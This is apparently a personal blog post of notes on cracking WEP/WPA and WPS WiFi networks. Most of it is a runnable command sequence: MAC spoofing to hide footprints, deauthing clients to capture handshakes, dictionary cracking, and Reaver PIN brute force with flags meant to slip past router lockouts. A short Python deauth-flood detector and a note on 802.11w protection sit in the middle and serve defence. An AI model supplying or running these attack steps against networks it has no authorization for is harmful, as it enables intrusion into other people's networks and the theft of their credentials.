Cracking the WiFi Networks WEP/WEP2/WPS


Alok Choudhary
Austin, TX

Disclaimer: This info is shared for education purposes only. I don't take any responsibility if any person/org uses it to intentionally harm anyone.

This is less like a tutorial and more like my personal notes while studying security.

Things you need: Kali Linux, Aircrack-ng suite (NO EXCEPTIONS)

1. Take the interface down so it is not connected to any network:
ifconfig wlan0 down

2. Start wlan0 in monitor mode; the result will be mon0, mon1, … mon#:
airmon-ng start wlan0

3. Change the MAC address of the monitor interface (not needed, but pen testing can't be done without clearing out your own footprints):
ifconfig mon0 down
macchanger -r mon0   # assigns a random MAC address to the monitor interface
ifconfig mon0 up

4. Check that you got a new MAC address:
ifconfig mon0

5. Dump from a specific channel:
airodump-ng mon0 -c 11

6. Start the packet dump and write it to a file:
airodump-ng -w H6762 --bssid BC:CA:B5:39:67:60 -c 11 --ivs mon0

-w fileName: prefix used to name the .ivs files
--bssid: the AP's MAC address
-c: channel number
--ivs: only dump IVs (initialization vectors), so the dump file stays small
mon0: your interface that is monitoring

7. Check packet injection:
aireplay-ng -9 -e HOME-6762 -a BC:CA:B5:39:67:60 mon0

8. Deauth the client so it connects again and we get the handshake between client and AP:
aireplay-ng --deauth 5 -a BC:00:B5:00:67:60 -c 84:00:A5:30:F0:00 mon0

--deauth: number of packets
-a: access point, AKA router
-c: client or station
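Seen from the defender's side, the burst of deauth frames in step 8 is exactly the pattern a wireless IDS flags: legitimate deauths are rare and never arrive as several frames in a fraction of a second from one BSSID toward one station, followed by an immediate re-association. The Python below is an added example, not part of these notes or of the Aircrack-ng suite. It runs a sliding-window detector over a constructed, simplified frame log (time, frame subtype, transmitter, receiver); the addresses are reused from the notes above, and in a real deployment the tuples would come from a monitor-mode capture.

```python
from collections import defaultdict, deque

# Addresses borrowed from the notes above; the log itself is constructed.
AP_BSSID = "bc:00:b5:00:67:60"
STATION = "84:00:a5:30:f0:00"
BROADCAST = "ff:ff:ff:ff:ff:ff"

# Constructed sample log: (time in seconds, frame subtype, transmitter addr2, receiver addr1).
SAMPLE_FRAMES = [
    (0.00, "beacon", AP_BSSID, BROADCAST),
    (0.50, "data", STATION, AP_BSSID),
    (1.00, "deauth", AP_BSSID, STATION),   # one isolated deauth (e.g. idle timeout): not a flood
    (9.00, "beacon", AP_BSSID, BROADCAST),
    # Five deauths in 160 ms, the shape of `aireplay-ng --deauth 5`. addr2 is spoofed
    # to the AP, so judged by addresses alone the frames appear to come from the AP.
    (10.00, "deauth", AP_BSSID, STATION),
    (10.04, "deauth", AP_BSSID, STATION),
    (10.08, "deauth", AP_BSSID, STATION),
    (10.12, "deauth", AP_BSSID, STATION),
    (10.16, "deauth", AP_BSSID, STATION),
    (10.30, "auth", STATION, AP_BSSID),    # station reconnects; the 4-way handshake follows
    (10.35, "assoc_req", STATION, AP_BSSID),
]


def detect_deauth_floods(frames, window_s=1.0, threshold=4):
    """Flag (transmitter, receiver) pairs that send >= `threshold` deauth or
    disassoc frames inside any sliding window of `window_s` seconds.

    `frames` must be ordered by time. Returns one alert dict per offending
    pair with the peak count seen in a window and the time span of the burst.
    """
    recent = defaultdict(deque)   # pair -> timestamps still inside the window
    alerts = {}
    for ts, subtype, src, dst in frames:
        if subtype not in ("deauth", "disassoc"):
            continue
        pair = (src, dst)
        window = recent[pair]
        window.append(ts)
        # Drop timestamps that fell out of the window (window is never empty here).
        while ts - window[0] > window_s:
            window.popleft()
        if len(window) >= threshold:
            alert = alerts.setdefault(pair, {
                "transmitter": src,
                "receiver": dst,
                "count": 0,
                "first_ts": window[0],
                "last_ts": ts,
            })
            alert["count"] = max(alert["count"], len(window))
            alert["last_ts"] = ts
    return list(alerts.values())


if __name__ == "__main__":
    for a in detect_deauth_floods(SAMPLE_FRAMES):
        print(f"deauth flood: {a['count']} frames {a['transmitter']} -> {a['receiver']} "
              f"between t={a['first_ts']} and t={a['last_ts']}")
```

Two things the example makes visible. First, because the attacker spoofs the AP's address in addr2, the alert attributes the flood to the AP itself; the reliable signal is the rate and the reconnect that follows, not the source address. Second, the only real fix is on the protocol side: 802.11w (Protected Management Frames) authenticates deauth and disassoc frames, so a station that negotiates PMF simply discards forged ones and the handshake never gets re-triggered.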

9. Start the dictionary attack to crack the handshake we got in the previous step:
aircrack-ng H6562-02.ivs -w /usr/share/wordlists/rockyou.txt

Yup, if the password is in the text file, it will be cracked 100% of the time. There are bigger files that go up to 15 GB uncompressed.

Please keep in mind brute force can take a lot of time. So in my opinion, it's not a practical approach for home users to crack a password with their home computer. No offense.

Cracking WPS security the Reaver way

wash -i mon0
reaver -i mon0 --channel 1 --essid SOME-2452 --bssid F8:EE:A5:WW:FF:50 -vv

A little description of WPS, and why it is so much easier when it comes to brute force:

An 8-digit PIN using 0-9 = 10 to the 8th possible combinations (100,000,000).

However, since the 8th digit isn't part of the PIN but just a checksum of the other 7, the total = 10 to the 7th (10,000,000).

However, WPS presents the PIN in two halves for verification. So once the first half of 4 digits is correct, the attacker only has to work on the other half of 4.

Don't forget the second half has one space taken by the checksum, so really it's just 3 digits in the second half.

The correct total for WPS is 10 to the 4th + 10 to the 3rd = 11,000. So the first half has 10,000 possible combinations and the second half has just 1,000.

Short keys (--dh-small, -S) will speed it up. My lab gives me 22-90 secs a PIN on routers with updated firmware, 2-3 seconds on old firmware.

Also note that even though the router says locked or no WPS, hit it anyway (-L) to vet that, because my recent tests show they are unlocked yet flagging locked.

What I used last:

reaver -i monx -a -S -N -E -b xx:xx:xx:xx:xx:xx -vv -d 3   # -r 2:199 # if you are getting locked out too much, add that; it may help

-a Auto-select some advanced features.

-S Use small Diffie-Hellman keys (reduces strain on the router & increases speed).

-N No NACKs, just speeds things up a bit.

-E Terminate each PIN attempt with an EAPOL FAIL, so it may trick the router into thinking the PIN failed and may let you try more before it locks.

-d Delay between PIN attempts; the default is 1 second.

-r Recurring delay: sleep for y seconds every x PIN attempts.
